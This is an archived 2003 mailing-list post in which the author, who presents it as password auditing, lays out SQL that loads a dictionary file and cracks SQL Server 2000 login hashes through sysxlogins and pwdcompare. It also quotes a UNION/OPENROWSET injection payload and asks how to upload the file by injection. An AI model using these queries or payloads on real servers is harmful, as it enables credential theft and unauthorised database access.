From: Indian Tiger (indiantiger@mailandnews.com)
Date: Tue Jan 28 2003 - 04:40:42 EST
Hi,
I am trying to write a script for a password testing tool over sql server
2000.
I am using master..sysxlogins.passowrd column in which SQL server stroes
all the passwords, then we comapre this column to a file sotred on the
client machine. I am facing problem to compare two files one on the client &
another one on the server so for that I want some way to transfer file from
the clinet site to the server site.
First Step: Creating a Table Password-List
create table Password-List (word char(40)) ;
Second Step: Inserting Data from Dictionary file to Password Table
bulk insert Password-List from 'e:\vipul\Dictionary.txt'
Third Step: Comparing Password-List with SQL Server password table
select (Password-List.word) as "Password",master..sysxlogins.name as
"UserName" from master..sysxlogins,Password-List
where pwdcompare(rtrim(Password-List.word),master..sysxlogins.password) = 1;
Is there any way to transfer a file from client to server using SQL
injections or something else?
The file (dictionary.txt) which I am compairing is collection of thousants
of words, which I have generated by some logic.
One way could be to generate one password and then send it to server using
sql injection like this
' UNION SELECT * FROM
OPENROWSET('SQLOLEDB','localhost';'sa';'genpwd','SELECT @@version')--
But I would be a tedious job to send all the password one by one, I want to
send whole file to server so I can compare all the passwords in a single
query. Please suggest something on this.
Any help, suggestion on this would be highly appriciated.
Thanking You.
Sincerely,
Indian Tiger, CISSP
----------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7
: Sat Apr 12 2008 - 10:53:29 EDT
<Pre>Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box?
CORE IMPACT does.</Pre>
<A href="http://www.securityfocus.com/core"> http://www.securityfocus.com/core>